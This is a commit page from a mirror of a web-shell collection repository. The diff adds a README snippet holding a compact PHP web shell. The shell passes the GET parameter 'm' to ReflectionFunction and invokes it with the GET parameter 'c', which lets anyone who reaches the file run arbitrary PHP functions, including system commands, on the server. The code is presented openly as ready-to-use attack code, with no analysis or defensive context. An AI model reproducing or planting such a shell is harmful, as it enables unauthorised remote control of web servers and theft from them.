mirror of
https://github.com/tennc/webshell
synced 2025-02-17 02:08:23 +00:00
update readme.md
This commit is contained in:
parent
3e85c60510
commit
8eb3d3e519
1 changed files with 11 additions and 0 deletions
|
@ -1,3 +1,14 @@
|
||||||
|
|
||||||
|
|
||||||
<img src="11.jpg" alt="alt text" title="Title" />
|
<img src="11.jpg" alt="alt text" title="Title" />
|
||||||
|
|
||||||
|
|
||||||
|
***************************************************
|
||||||
|
code:
|
||||||
|
|
||||||
|
<?php
|
||||||
|
$func = new ReflectionFunction($_GET[m]);
|
||||||
|
echo $func->invokeArgs(array($_GET[c]));
|
||||||
|
?>
|
||||||
|
|
||||||
|
***************************************************
|
Loading…
Add table
Reference in a new issue